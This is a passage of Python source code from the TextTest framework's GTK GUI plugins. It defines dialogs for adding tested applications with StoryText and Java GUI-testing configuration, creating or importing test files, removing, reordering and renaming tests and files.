def __init__(self, allApps, dynamic, inputOptions):
guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions)
self.fileChooser = None
self.newApplication = None
self.inputOptions = inputOptions
self.rootDirectories = inputOptions.rootDirectories
self.addOption("name", "Full name of application", description="Name of application to use in reports etc.")
self.addOption("ext", "\nFile extension to use for TextTest files associated with this application", description="Short space-free extension, to identify all TextTest's files associated with this application")
possibleSubDirs = self.findSubDirectories()
self.addOption("subdir", "\nSubdirectory name to store the above application files under (leave blank for local storage)", possibleValues=possibleSubDirs)
self.addOption("javaclass", "\nJava Class name (instead of executable program)")
self.addSwitch("gui", "GUI testing option chooser",
options = [ "Disable GUI testing options",
"PyGTK GUI with StoryText",
"Tkinter GUI with StoryText",
"wxPython GUI with StoryText",
"SWT GUI with StoryText",
"Eclipse RCP GUI with StoryText",
"Eclipse GEF GUI with StoryText",
"Java Swing GUI with StoryText",
"Other embedded Use-case Recorder (e.g. NUseCase)",
"Other GUI-test tool (enable virtual display only)" ],
hideOptions=True)
self.addSwitch("cpmock", "Enable CaptureMock for record/playback mocking")
possibleDirs = []
for app in allApps:
if app.getDirectory() not in possibleDirs:
possibleDirs.append(app.getDirectory())
if len(possibleDirs) == 0:
possibleDirs = self.rootDirectories
self.addOption("exec", "\nSelect executable program to test", description="The full path to the program you want to test", possibleDirs=possibleDirs, selectFile=True)
def createFileChooser(self, *args):
self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args)
return self.fileChooser
def createOptionWidget(self, option):
box, entry = guiplugins.ActionDialogGUI.createOptionWidget(self, option)
if option is self.optionGroup.getOption("javaclass"):
entry.connect("changed", self.javaClassChanged)
return box, entry
def javaClassChanged(self, *args):
if self.fileChooser:
self.setFileChooserSensitivity()
def setFileChooserSensitivity(self):
javaclass = self.optionGroup.getValue("javaclass")
sensitive = self.fileChooser.get_property("sensitive")
newSensitive = len(javaclass) == 0
if newSensitive != sensitive:
self.fileChooser.set_property("sensitive", newSensitive)
def findSubDirectories(self):
allDirs = []
for rootDir in self.rootDirectories:
usableFiles = filter(lambda f: f not in plugins.controlDirNames, os.listdir(rootDir))
allFiles = [ os.path.join(rootDir, f) for f in usableFiles ]
allDirs += filter(os.path.isdir, allFiles)
allDirs.sort()
return map(os.path.basename, allDirs)
def isActiveOnCurrent(self, *args):
return True
def _getStockId(self):
return "add"
def _getTitle(self):
return "Add Application"
def messageAfterPerform(self):
pass
def getTooltip(self):
return "Define a new tested application"
def checkSanity(self, ext, executable, subdir, directory, javaClass):
if not ext:
raise plugins.TextTestError, "Must provide a file extension for TextTest files"
for char in " ./":
if char in ext:
raise plugins.TextTestError, "File extensions may not contain the character " + repr(char) + ". It's recommended to stick to alphanumeric characters for this field."
if not javaClass and (not executable or not os.path.isfile(executable)):
raise plugins.TextTestError, "Must provide a valid path to a program to test"
for char in "/\\":
if char in subdir:
raise plugins.TextTestError, "Subdirectory name must be a local name (not contain " + repr(char) + ").\nTextTest only looks for applications one level down in the hierarchy."
if os.path.exists(os.path.join(directory, "config." + ext)):
raise plugins.TextTestError, "Test-application already exists at the indicated location with the indicated extension: please choose another name"
def getSignalsSent(self):
return [ "NewApplication" ]
def getMainClass(self, jarFile):
f = ZipFile(jarFile).open("META-INF/MANIFEST.MF")
for line in f:
parts = [ part.strip() for part in line.split(":") ]
if len(parts) == 2 and parts[0] == "Main-Class":
return parts[1]
def getStatusMessage(self, app):
return "Created new application '" + app.fullName() + "'."
def performOnCurrent(self):
executable = self.optionGroup.getOptionValue("exec")
ext = self.optionGroup.getOptionValue("ext")
subdir = self.optionGroup.getOptionValue("subdir")
directory = self.findFullDirectoryPath(subdir)
javaClass = self.optionGroup.getOptionValue("javaclass")
self.checkSanity(ext, executable, subdir, directory, javaClass)
plugins.ensureDirectoryExists(directory)
if javaClass:
executable = javaClass
configEntries = OrderedDict({ "executable" : executable })
configEntries["filename_convention_scheme"] = "standard"
if javaClass:
configEntries["interpreter"] = "java"
fullName = self.optionGroup.getOptionValue("name")
if fullName:
configEntries["full_name"] = fullName
if self.optionGroup.getSwitchValue("cpmock"):
configEntries["import_config_file"] = "capturemock_config"
useGui = self.optionGroup.getSwitchValue("gui")
if useGui > 0:
configEntries["use_case_record_mode"] = "GUI"
if useGui in range(1, 8):
configEntries["use_case_recorder"] = "storytext"
storytextDir = os.path.join(directory, "storytext_files")
plugins.ensureDirectoryExists(storytextDir)
# Create an empty UI map file so it shows up in the Config tab...
open(os.path.join(storytextDir, "ui_map.conf"), "w")
toolkits = [ "gtk", "tkinter", "wx", "javaswt", "javarcp", "javagef", "javaswing" ]
toolkit = toolkits[useGui - 1]
if "java" in toolkit:
self.setJavaGuiTestingEntries(toolkit, directory, ext, configEntries)
else:
self.setPythonGuiTestingEntries(toolkit, directory, ext, configEntries)
elif useGui == 9:
configEntries["use_case_recorder"] = "none"
self.newApplication = self.createApplication(ext, directory, configEntries)
self.notify("NewApplication", self.newApplication)
self.notify("Status", self.getStatusMessage(self.newApplication))
def createApplication(self, ext, directory, configEntries):
dircache = testmodel.DirectoryCache(directory)
newApp = testmodel.Application(ext, dircache, [], self.inputOptions, configEntries)
dircache.refresh() # we created a config file...
return newApp
def respond(self, *args):
if len(self.validApps) > 0:
return guiplugins.ActionDialogGUI.respond(self, *args)
def runDialog(self):
dialog = self.showConfigurationDialog()
width = guiutils.guiConfig.getWindowDimension("width", self.diag)
height = guiutils.guiConfig.getWindowDimension("height", self.diag)
dialog.resize(width, height)
while True:
response = dialog.run()
if response != gtk.RESPONSE_ACCEPT:
raise plugins.TextTestError, "Application creation cancelled."
try:
self.performOnCurrent()
break
except plugins.TextTestError, e:
self.showErrorDialog(str(e))
dialog.hide()
dialog.destroy()
return self.newApplication, self.getStatusMessage(self.newApplication)
def getFileOnPath(self, fileName):
for pathElem in os.getenv("PATH").split(os.pathsep):
fullPath = os.path.join(pathElem, fileName)
if os.path.isfile(fullPath):
return fullPath
def getStoryTextPythonInterpreter(self, toolkit):
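        # On POSIX the 'storytext' launcher can be invoked directly; on Windows we look for storytext.py on PATH and run it via python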
if os.name == "posix":
return "storytext -i " + toolkit
else:
storytextPath = self.getFileOnPath("storytext.py")
if storytextPath:
return "python " + storytextPath + " -i " + toolkit
else:
raise plugins.TextTestError, "Could not set up Python-GUI testing with StoryText, could not find StoryText installation on PATH"
def setPythonGuiTestingEntries(self, toolkit, directory, ext, configEntries):
configEntries["interpreter"] = self.getStoryTextPythonInterpreter(toolkit)
if toolkit == "gtk":
comment = "XDG_CONFIG_HOME points to user's ~/.config directory.\n" + \
"Behaviour of e.g. FileChoosers can vary wildly depending on settings there.\n" + \
"The following settings makes sure it uses an empty test-dependent directory instead."
configEntries["section_comment"] = comment
configEntries["copy_test_path"] = "xdg_config_home"
configEntries["test_data_ignore"] = "xdg_config_home"
configEntries["test_data_environment"] = [("xdg_config_home", "XDG_CONFIG_HOME")]
elif toolkit == "tkinter":
# StoryText doesn't handle tkMessageBox, deal with it via interception by default
comment = "Tkinter doesn't provide any means to simulate interaction with tkMessageBox.\n" + \
"Therefore StoryText cannot handle it. So we capture interaction with it instead.\n" + \
"Cannot have multiple threads interacting with tkinter so we disable the threading also."
configEntries["section_comment"] = comment
configEntries["import_config_file"] = "capturemock_config"
cpMockFileName = os.path.join(directory, "capturemockrc." + ext)
with open(cpMockFileName, "w") as f:
f.write("[python]\n" +
"intercepts = tkMessageBox\n\n" +
"[general]\n" +
"server_multithreaded = False\n")
elif toolkit == "wx":
comment = "wxPython GUIs don't seem to work very well when the hide flag is set on Windows.\n" + \
"So we disable it by default here: multiple desktops may be useful."
configEntries["section_comment"] = comment
configEntries["virtual_display_hide_windows"] = "false"
def findStoryTextInPath(self):
suffix = ".bat" if os.name == "nt" else ""
for pathElem in os.getenv("PATH").split(os.pathsep):
storytextPath = os.path.join(pathElem, "storytext")
jythonPath = os.path.join(pathElem, "jython" + suffix)
if os.path.isfile(storytextPath) and os.path.isfile(jythonPath):
return storytextPath, jythonPath
return None, None
def findSwingLibraryPath(self, storytextPath):
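        # Look for the swinglibrary jar shipped alongside the StoryText installation and return its directory as a classpath wildcard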
rootDir = os.path.dirname(os.path.dirname(storytextPath))
pattern = "swinglibrary-*.jar"
for root, _, files in os.walk(rootDir):
for file in files:
if fnmatch(file, pattern):
return os.path.join(rootDir, root, "*")
def has_special_chars(self, path):
return " " in path or "(" in path
def get_dos_corrected_path(self, path):
if os.name == "posix" or not self.has_special_chars(path):
return path
# Windows paths with spaces don't work in classpaths, figure out the correct DOS path
dirname, local = os.path.split(path)
if self.has_special_chars(local):
p = subprocess.Popen([ "dir", "/x" ], cwd=dirname, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = p.communicate()[0]
for line in out.splitlines():
if line.endswith(local):
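                    # Assumes the 8.3 short name is the fourth whitespace-separated field of the 'dir /x' output line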
parts = line.split()
local = parts[3]
break
return os.path.join(self.get_dos_corrected_path(dirname), local)
def setJavaGuiTestingEntries(self, toolkit, directory, ext, configEntries):
storytextPath, jythonPath = self.findStoryTextInPath()
if not storytextPath:
raise plugins.TextTestError, "Could not set up Java-GUI testing with StoryText, could not find StoryText/Jython installation on PATH"
interpreters = [("jython", jythonPath), ("storytext", storytextPath)]
configEntries["interpreters"] = interpreters
# Jython messages, probably don't want to compare them
configEntries["run_dependent_text"] = [("stderr*", "\\*sys-package-mgr\\*")]
executable = configEntries["executable"]
classpath = []
if executable.endswith(".jar"):
# Java Guis of one sort or another
# We don't know how to load jar files directly, store the main class name and add the jar file to the environment.
mainClass = self.getMainClass(executable)
if not mainClass:
raise plugins.TextTestError, "Jar file provided has no main class specified, cannot use it as an executable"
classpath.append(self.get_dos_corrected_path(executable))
configEntries["executable"] = mainClass
if "swing" in toolkit:
swingLibraryPath = self.findSwingLibraryPath(storytextPath)
if swingLibraryPath:
classpath.append(swingLibraryPath)
if classpath:
fileName = os.path.join(directory, "environment." + ext)
with open(fileName, "a") as f:
f.write("CLASSPATH:" + os.pathsep.join(classpath) + "\n")
storytextOptionsFile = os.path.join(directory, "storytext_options." + ext)
with open(storytextOptionsFile, "w") as f:
f.write("# StoryText options. Run storytext --help for more information on what can be added here\n")
f.write("-i " + toolkit + "\n")
with open(storytextOptionsFile + ".debug", "w") as f:
f.write("-l debug\n")
jythonOptionsFile = os.path.join(directory, "jython_options." + ext)
with open(jythonOptionsFile, "w") as f:
f.write("# Add Java properties as required, for example:\n")
f.write("#-Djava.util.prefs.userRoot=preferences\n")
f.write("# Can also supply JVM arguments by prefixing them with -J, for example:\n")
f.write("#-J-XX:MaxPermSize=128M")
def findFullDirectoryPath(self, subdir):
for rootDir in self.rootDirectories:
candidate = os.path.normpath(os.path.join(rootDir, subdir))
if os.path.isdir(candidate):
return candidate
return os.path.normpath(os.path.join(self.rootDirectories[0], subdir))
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.7, 0.9
class ImportFiles(guiplugins.ActionDialogGUI):
def __init__(self, allApps, dynamic, inputOptions):
self.creationDir = None
self.defaultAppendAppName = False
self.appendAppName = False
self.currentStem = ""
self.fileChooser = None
self.newFileInfo = (None, False)
guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions)
self.addOption("stem", "Type of file/directory to create", allocateNofValues=2)
self.addOption("v", "Version identifier to use")
possibleDirs = self.getPossibleDirs(allApps, inputOptions)
# The point of this is that it's never sensible as the source for anything, so it serves as a "use the parent" option
# for back-compatibility
self.addSwitch("act", options=[ "Import file/directory from source", "Create a new file", "Create a new directory" ])
self.addOption("src", "Source to copy from", selectFile=True, possibleDirs=possibleDirs)
def getPossibleDirs(self, allApps, inputOptions):
if len(allApps) > 0:
return sorted(set((app.getDirectory() for app in allApps)))
else:
return inputOptions.rootDirectories
def singleTestOnly(self):
return True
def _getTitle(self):
return "Create/_Import"
def getTooltip(self):
return "Create a new file or directory, possibly by copying it"
def _getStockId(self):
return "new"
def getDialogTitle(self):
return "Create/Import Files and Directories"
def isActiveOnCurrent(self, *args):
return self.creationDir is not None and guiplugins.ActionDialogGUI.isActiveOnCurrent(self, *args)
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.7, 0.9
def getSignalsSent(self):
return [ "NewFile" ]
def messageAfterPerform(self):
pass
def updateOptions(self):
self.currentStem = ""
return False
def fillVBox(self, vbox, group):
test = self.currTestSelection[0]
dirText = self.getDirectoryText(test)
self.addText(vbox, "<b><u>" + dirText + "</u></b>")
self.addText(vbox, "<i>(Test is " + repr(test) + ")</i>")
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group)
def stemChanged(self, *args):
option = self.optionGroup.getOption("stem")
newStem = option.getValue()
if newStem in option.possibleValues and newStem != self.currentStem:
self.currentStem = newStem
version = self.optionGroup.getOptionValue("v")
sourcePath = self.getDefaultSourcePath(newStem, version)
self.optionGroup.setValue("src", sourcePath)
if self.defaultAppendAppName:
self.updateAppendAppName(newStem != "testcustomize.py")
def actionChanged(self, *args):
if self.fileChooser:
self.setFileChooserSensitivity()
def setFileChooserSensitivity(self):
action = self.optionGroup.getValue("act")
sensitive = self.fileChooser.get_property("sensitive")
newSensitive = action == 0
if newSensitive != sensitive:
self.fileChooser.set_property("sensitive", newSensitive)
def getTargetPath(self, *args, **kwargs):
targetPathName = self.getFileName(*args, **kwargs)
return os.path.join(self.creationDir, targetPathName)
def getDefaultSourcePath(self, stem, version):
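        # Suggest the most specific existing file for this stem as the source to copy from; if that equals the target path, fall back to the next one, otherwise to the test directory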
targetPath = self.getTargetPath(stem, version)
test = self.currTestSelection[0]
pathNames = test.getAllPathNames(stem, refVersion=version)
if len(pathNames) > 0:
firstSource = pathNames[-1]
if os.path.basename(firstSource).startswith(stem + "." + test.app.name):
targetPath = self.getTargetPath(stem, version, appendAppName=True)
if firstSource != targetPath:
return firstSource
elif len(pathNames) > 1:
return pathNames[-2]
return test.getDirectory()
def createComboBoxEntry(self, *args):
combobox, entry = guiplugins.ActionDialogGUI.createComboBoxEntry(self, *args)
combobox.connect("changed", self.stemChanged)
return combobox, entry
def createRadioButtons(self, *args):
buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args)
buttons[0].connect("toggled", self.actionChanged)
return buttons
def createFileChooser(self, *args):
self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args)
self.fileChooser.set_name("Source File Chooser")
self.setFileChooserSensitivity() # Check initial values, maybe set insensitive
return self.fileChooser
def addText(self, vbox, text):
header = gtk.Label()
header.set_markup(text + "\n")
vbox.pack_start(header, expand=False, fill=False)
def getDirectoryText(self, test):
relDir = plugins.relpath(self.creationDir, test.getDirectory())
if relDir:
return "Create or import files in test subdirectory '" + relDir + "'"
else:
return "Create or import files in the test directory"
def notifyFileCreationInfo(self, creationDir, fileType):
self.fileChooser = None
if fileType == "external":
self.creationDir = None
self.setSensitivity(False)
else:
self.creationDir = creationDir
newActive = creationDir is not None
self.setSensitivity(newActive)
if newActive:
self.updateStems(fileType)
self.defaultAppendAppName = (fileType == "definition" or fileType == "standard")
self.updateAppendAppName(self.defaultAppendAppName)
def updateAppendAppName(self, setting):
self.appendAppName = setting
self.optionGroup.setValue("act", int(setting))
def findAllStems(self, fileType):
if fileType == "definition":
return self.getDefinitionFiles()
elif fileType == "data":
return self.currTestSelection[0].getDataFileNames()
elif fileType == "standard":
return self.getStandardFiles()
else:
return []
def getDefinitionFiles(self):
defFiles = []
defFiles.append("environment")
defFiles.append("config")
defFiles.append("options")
for interpreter in self.currTestSelection[0].getConfigValue("interpreters").keys():
defFiles.append(interpreter + "_options")
if self.currTestSelection[0].classId() == "test-case":
recordMode = self.currTestSelection[0].getConfigValue("use_case_record_mode")
if recordMode == "disabled":
namingScheme = self.currTestSelection[0].getConfigValue("filename_convention_scheme")
defFiles.append(self.currTestSelection[0].app.getStdinName(namingScheme))
else:
defFiles.append("usecase")
# We only want to create files this way that
# (a) are not created and understood by TextTest itself ("builtin")
# (b) are not auto-generated ("regenerate")
# That leaves the rest ("default")
return defFiles + self.currTestSelection[0].expandedDefFileStems("default")
def getStandardFiles(self):
app = self.currTestSelection[0].app
collateKeys = app.getConfigValue("collate_file").keys()
# Don't pick up "dummy" indicators on Windows...
namingScheme = app.getConfigValue("filename_convention_scheme")
stdFiles = [ app.getStdoutName(namingScheme), app.getStderrName(namingScheme) ] + filter(lambda k: k, collateKeys)
discarded = [ "stacktrace" ] + app.getConfigValue("discard_file")
return filter(lambda f: f not in discarded, stdFiles)
def updateStems(self, fileType):
stems = self.findAllStems(fileType)
if len(stems) > 0:
self.optionGroup.setValue("stem", stems[0])
else:
self.optionGroup.setValue("stem", "")
self.optionGroup.setPossibleValues("stem", stems)
def getFileName(self, stem, version, appendAppName=False):
fileName = stem
if self.appendAppName or appendAppName:
fileName += "." + self.currTestSelection[0].app.name
if version:
fileName += "." + version
return fileName
def performOnCurrent(self):
stem = self.optionGroup.getOptionValue("stem")
version = self.optionGroup.getOptionValue("v")
action = self.optionGroup.getSwitchValue("act")
test = self.currTestSelection[0]
if action > 0: # Create new
targetPath = self.getTargetPath(stem, version)
if os.path.exists(targetPath):
raise plugins.TextTestError, "Not creating file or directory : path already exists:\n" + targetPath
if action == 1:
plugins.ensureDirExistsForFile(targetPath)
file = open(targetPath, "w")
file.close()
test.refreshFiles()
self.newFileInfo = targetPath, False
elif action == 2:
plugins.ensureDirectoryExists(targetPath)
test.filesChanged()
else:
sourcePath = self.optionGroup.getOptionValue("src")
appendAppName = os.path.basename(sourcePath).startswith(stem + "." + test.app.name)
targetPath = self.getTargetPath(stem, version, appendAppName)
plugins.ensureDirExistsForFile(targetPath)
fileExisted = os.path.exists(targetPath)
plugins.copyPath(sourcePath, targetPath)
self.newFileInfo = targetPath, fileExisted
def endPerform(self):
# Shouldn't start new actions until the current ones complete, framework doesn't like it
guiplugins.ActionDialogGUI.endPerform(self)
fileName, existed = self.newFileInfo
if fileName:
self.notify("NewFile", fileName, existed)
self.newFileInfo = (None, False)
class RemoveTests(guiplugins.ActionGUI):
def __init__(self, *args, **kw):
self.distinctTestCount = 0
guiplugins.ActionGUI.__init__(self, *args, **kw)
def isActiveOnCurrent(self, *args):
return any((test.parent for test in self.currTestSelection))
def getActionName(self):
return "Remove Tests"
def _getTitle(self):
return "Remove Tests..."
def _getStockId(self):
return "delete"
def getTooltip(self):
return "Remove selected tests"
def getTestCountDescription(self):
desc = plugins.pluralise(self.distinctTestCount, "test")
diff = len(self.currTestSelection) - self.distinctTestCount
if diff > 0:
desc += " (with " + plugins.pluralise(diff, "extra instance") + ")"
return desc
def updateSelection(self, tests, apps, rowCount, *args):
self.distinctTestCount = rowCount
return guiplugins.ActionGUI.updateSelection(self, tests, apps, rowCount, *args)
def getFileRemoveWarning(self):
return "This will remove files from the file system and hence may not be reversible."
def getConfirmationMessage(self):
        extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n"
currTest = self.currTestSelection[0]
if len(self.currTestSelection) == 1:
if currTest.classId() == "test-case":
return "\nYou are about to remove the test '" + currTest.name + \
"' and all associated files." + extraLines
else:
return "\nYou are about to remove the entire test suite '" + currTest.name + \
"' and all " + str(currTest.size()) + " tests that it contains." + extraLines
else:
return "\nYou are about to remove " + self.getTestCountDescription() + \
" and all associated files." + extraLines
def getTestsToRemove(self, list):
toRemove = []
warnings = ""
for test in list:
if not test.parent:
warnings += "\nThe root suite\n'" + test.name + " (" + test.app.name + ")'\ncannot be removed.\n"
continue
if test.classId() == "test-suite":
subTests, subWarnings = self.getTestsToRemove(test.testcases)
warnings += subWarnings
for subTest in subTests:
if not subTest in toRemove:
toRemove.append(subTest)
if not test in toRemove:
toRemove.append(test)
return toRemove, warnings
def performOnCurrent(self):
namesRemoved = []
toRemove, warnings = self.getTestsToRemove(self.currTestSelection)
permMessage = "Failed to remove test: didn't have sufficient write permission to the test files"
for test in toRemove:
dir = test.getDirectory()
if os.path.isdir(dir):
plugins.tryFileChange(self.removePath, permMessage, dir)
if plugins.tryFileChange(test.remove, permMessage):
namesRemoved.append(test.name)
self.notify("Status", "Removed test(s) " + ",".join(namesRemoved))
if warnings:
self.showWarningDialog(warnings)
@staticmethod
def removePath(dir):
return plugins.removePath(dir)
def messageAfterPerform(self):
pass # do it as part of the method as currentTest will have changed by the end!
class RemoveTestsForPopup(RemoveTests):
def _getTitle(self):
return "Remove..."
def getActionName(self):
return "Remove Tests For Popup"
class RemoveFiles(guiplugins.ActionGUI):
def notifyFileCreationInfo(self, creationDir, fileType):
canRemove = fileType != "external" and \
(creationDir is None or len(self.currFileSelection) > 0) and \
self.isActiveOnCurrent()
self.setSensitivity(canRemove)
def isActiveOnCurrent(self, *args):
return len(self.currFileSelection) > 0
def getActionName(self):
return "Remove Files"
def _getTitle(self):
return "Remove..."
def _getStockId(self):
return "delete"
def getTooltip(self):
return "Remove selected files"
def getFileRemoveWarning(self):
return "This will remove files from the file system and hence may not be reversible."
def getConfirmationMessage(self):
        extraLines = "\n\nNote: " + self.getFileRemoveWarning() + "\n\nAre you sure you wish to proceed?\n"
test = self.getFirstTest()
return "\nYou are about to remove " + plugins.pluralise(len(self.currFileSelection), self.getType(self.currFileSelection[0][0])) + \
self.getTestSuffix(test) + "." + extraLines
def inConfigTab(self):
return isinstance(self.currFileSelection[0][1], list)
def getTestSuffix(self, test):
return " from the " + test.classDescription() + " '" + test.name + "'" if test else ""
@staticmethod
def removePath(dir):
return plugins.removePath(dir)
def getType(self, filePath):
if os.path.isdir(filePath):
return "directory"
else:
return "file"
def getFirstTest(self):
return self.currTestSelection[0] if not self.inConfigTab() else None
def performOnCurrent(self):
test = self.getFirstTest()
removed = 0
for filePath, _ in self.currFileSelection:
fileType = self.getType(filePath)
self.notify("Status", "Removing " + fileType + " " + os.path.basename(filePath))
self.notify("ActionProgress")
permMessage = "Insufficient permissions to remove " + fileType + " '" + filePath + "'"
if filePath.endswith(".shortcut"):
from storytext.replayer import ReplayScript
script = ReplayScript(filePath, False)
commands = "\n".join(script.commands)
self.notify("ShortcutRemove", ReplayScript.transformToRegexp(ReplayScript.tryToGetName(filePath)) + "\n renamed to " + commands + "\n")
if plugins.tryFileChange(self.removePath, permMessage, filePath):
removed += 1
if test:
test.filesChanged()
else:
self.appFilesChanged()
self.notify("Status", "Removed " + plugins.pluralise(removed, fileType) + self.getTestSuffix(test))
def getSignalsSent(self):
return [ "ReloadConfig", "ShortcutRemove" ]
def appFilesChanged(self):
appsSeen = set()
for _, apps in self.currFileSelection:
for app in apps:
if app not in appsSeen:
appsSeen.add(app)
app.refreshFiles()
self.notify("ReloadConfig")
def messageAfterPerform(self):
pass # do it as part of the method, uses lots of local data
class RepositionTest(guiplugins.ActionGUI):
def singleTestOnly(self):
return True
def _isActiveOnCurrent(self):
return guiplugins.ActionGUI.isActiveOnCurrent(self) and \
self.currTestSelection[0].parent and \
not self.currTestSelection[0].parent.autoSortOrder
def getSignalsSent(self):
return [ "RefreshTestSelection" ]
def performOnCurrent(self):
newIndex = self.findNewIndex()
test = self.currTestSelection[0]
permMessage = "Failed to reposition test: no permissions to edit the testsuite file"
if plugins.tryFileChange(test.parent.repositionTest, permMessage, test, newIndex):
self.notify("RefreshTestSelection")
else:
raise plugins.TextTestError, "\nThe test\n'" + test.name + "'\nis not present in the default version\nand hence cannot be reordered.\n"
class RepositionTestDown(RepositionTest):
def _getStockId(self):
return "go-down"
def _getTitle(self):
return "Move down"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " one step down in suite."
def getTooltip(self):
return "Move selected test down in suite"
def findNewIndex(self):
return min(self.currTestSelection[0].positionInParent() + 1, self.currTestSelection[0].parent.maxIndex())
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[self.currTestSelection[0].parent.maxIndex()] != self.currTestSelection[0]
class RepositionTestUp(RepositionTest):
def _getStockId(self):
return "go-up"
def _getTitle(self):
return "Move up"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " one step up in suite."
def getTooltip(self):
return "Move selected test up in suite"
def findNewIndex(self):
return max(self.currTestSelection[0].positionInParent() - 1, 0)
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0]
class RepositionTestFirst(RepositionTest):
def _getStockId(self):
return "goto-top"
def _getTitle(self):
return "Move to first"
def messageAfterPerform(self):
return "Moved " + self.describeTests() + " to first in suite."
def getTooltip(self):
return "Move selected test to first in suite"
def findNewIndex(self):
return 0
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
return self.currTestSelection[0].parent.testcases[0] != self.currTestSelection[0]
class RepositionTestLast(RepositionTest):
def _getStockId(self):
return "goto-bottom"
def _getTitle(self):
return "Move to last"
def messageAfterPerform(self):
return "Moved " + repr(self.currTestSelection[0]) + " to last in suite."
def getTooltip(self):
return "Move selected test to last in suite"
def findNewIndex(self):
return self.currTestSelection[0].parent.maxIndex()
def isActiveOnCurrent(self, *args):
if not self._isActiveOnCurrent():
return False
currLastTest = self.currTestSelection[0].parent.testcases[len(self.currTestSelection[0].parent.testcases) - 1]
return currLastTest != self.currTestSelection[0]
class RenameAction(guiplugins.ActionDialogGUI):
def singleTestOnly(self):
return True
def _getStockId(self):
return "italic"
def _getTitle(self):
return "_Rename..."
def messageAfterPerform(self):
pass # Use method below instead.
def basicNameCheck(self, newName):
if len(newName) == 0:
raise plugins.TextTestError, "Please enter a new name."
if " " in newName:
raise plugins.TextTestError, "The new name must not contain spaces, please choose another name."
def performOnCurrent(self):
try:
newName = self.optionGroup.getOptionValue("name")
self.basicNameCheck(newName)
self.performRename(newName)
except (IOError, OSError), e:
self.showErrorDialog("Failed to " + self.getActionName().lower() + ":\n" + str(e))
@staticmethod
def movePath(oldPath, newPath):
# overridden by version control modules
os.rename(oldPath, newPath)
class RenameTest(RenameAction):
def __init__(self, *args):
RenameAction.__init__(self, *args)
self.addOption("name", "\nNew name")
self.addOption("desc", "\nNew description", multilineEntry=True)
self.oldName = ""
self.oldDescription = ""
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.5, 0.36
def isActiveOnCurrent(self, *args):
# Don't allow renaming of the root suite
return guiplugins.ActionGUI.isActiveOnCurrent(self, *args) and bool(self.currTestSelection[0].parent)
def updateOptions(self):
self.oldName = self.currTestSelection[0].name
self.oldDescription = self.currTestSelection[0].description
self.optionGroup.setOptionValue("name", self.oldName)
self.optionGroup.setOptionValue("desc", self.oldDescription)
return True
def fillVBox(self, vbox, group):
header = gtk.Label()
header.set_markup("<b>" + plugins.convertForMarkup(self.oldName) + "</b>")
vbox.pack_start(header, expand=False, fill=False)
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group)
def getTooltip(self):
return "Rename selected test"
def getActionName(self):
return "Rename Test"
def getNameChangeMessage(self, newName):
return "Renamed test " + self.oldName + " to " + newName
def getChangeMessage(self, newName, newDesc):
if self.oldName != newName:
message = self.getNameChangeMessage(newName)
if self.oldDescription != newDesc:
message += " and changed description."
else:
message += "."
elif newDesc != self.oldDescription:
message = "Changed description of test " + self.oldName + "."
else:
message = "Nothing changed."
return message
def checkNewName(self, newName):
if newName != self.oldName:
for test in self.currTestSelection[0].parent.testCaseList():
if test.name == newName:
raise plugins.TextTestError, "The name '" + newName + "' is already taken, please choose another name."
newDir = os.path.join(self.currTestSelection[0].parent.getDirectory(), newName)
if os.path.isdir(newDir):
self.handleExistingDirectory(newDir)
def handleExistingDirectory(self, newDir): # In CVS we might need to override this...
raise plugins.TextTestError, "The directory " + newDir + " already exists, please choose another name."
def performRename(self, newName):
self.checkNewName(newName)
newDesc = self.optionGroup.getOptionValue("desc")
if newName != self.oldName or newDesc != self.oldDescription:
for test in self.currTestSelection:
# Do this first, so that if we fail we won't update the test suite files either
self.moveFiles(test, newName)
test.rename(newName, newDesc)
changeMessage = self.getChangeMessage(newName, newDesc)
self.oldName = newName
self.oldDescription = newDesc
self.notify("Status", changeMessage)
def moveFiles(self, test, newName):
# Create new directory, copy files if the new name is new (we might have
# changed only the comment ...)
if test.name != newName:
oldDir = test.getDirectory()
newDir = test.parent.getNewDirectoryName(newName)
if os.path.isdir(oldDir):
self.movePath(oldDir, newDir)
class RenameFile(RenameAction):
def __init__(self, *args):
RenameAction.__init__(self, *args)
self.addOption("name", "\nNew name for file")
self.oldName = ""
self.configAppList = []
def notifyFileCreationInfo(self, creationDir, fileType):
canRename = fileType != "external" and \
(creationDir is None or len(self.currFileSelection) > 0) and \
self.isActiveOnCurrent()
self.setSensitivity(canRename)
def isActiveOnCurrent(self, *args):
return len(self.currFileSelection) == 1
def singleTestOnly(self):
return True
def updateOptions(self):
self.oldName = os.path.basename(self.currFileSelection[0][0])
associatedObj = self.currFileSelection[0][1]
self.configAppList = associatedObj if isinstance(associatedObj, list) else []
self.optionGroup.setOptionValue("name", self.oldName)
return True
def getSignalsSent(self):
return [ "ReloadConfig", "ShortcutRename" ]
def _getStockId(self):
return "italic"
def getActionName(self):
return "Rename File"
def _getTitle(self):
return "_Rename..."
def getTooltip(self):
return "Rename selected file"
def messageAfterPerform(self):
pass # Use method below instead.
def getNameChangeMessage(self, newName):
return "Renamed file " + self.oldName + " to " + newName + "."
def checkNewName(self, newName, newPath):
if newName == self.oldName:
raise plugins.TextTestError, "Please enter a new name."
if os.path.exists(newPath):
raise plugins.TextTestError, "There is already a file or directory at '" + newName + "', please choose another name."
def getConfirmationMessage(self):
oldStem = self.oldName.split(".")[0]
newName = self.optionGroup.getOptionValue("name")
newStem = newName.split(".")[0]
if self.isDefinitionFileStem(oldStem) and not self.isDefinitionFileStem(newStem):
